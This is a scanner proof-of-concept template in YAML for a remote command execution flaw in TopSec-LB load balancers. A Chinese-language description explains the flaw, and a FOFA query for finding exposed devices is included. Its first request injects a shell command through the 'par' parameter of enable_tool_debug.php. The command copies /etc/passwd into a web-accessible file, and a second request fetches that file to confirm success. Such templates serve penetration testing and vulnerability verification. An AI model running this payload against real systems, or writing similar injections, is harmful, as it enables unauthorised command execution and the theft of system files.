id: topsec-topapp-rce

info:
  name: 天融信 TopSec-LB RCE
  author: peiqi
  severity: critical
  verified: true
  description: |
    天融信 TopSec-LB enable_tool_debug.php文件存在 远程命令执行漏洞，通过命令拼接攻击者可以执行任意命令
    fofa-query: app="天融信-TopApp-LB-负载均衡系统"

set:
  r1: randomLowercase(8)

rules:
  r0:
    request:
      method: GET
      path: /acc/tools/enable_tool_debug.php?val=0&tool=1&par=127.0.0.1' | cat /etc/passwd > ../../{{r1}}.txt |'
    expression: response.status == 200
  r1:
    request:
      method: GET
      path: /{{r1}}.txt
    expression: response.status == 200 && "root:.*?:[0-9]*:[0-9]*:".bmatches(response.body)
expression: r0() && r1()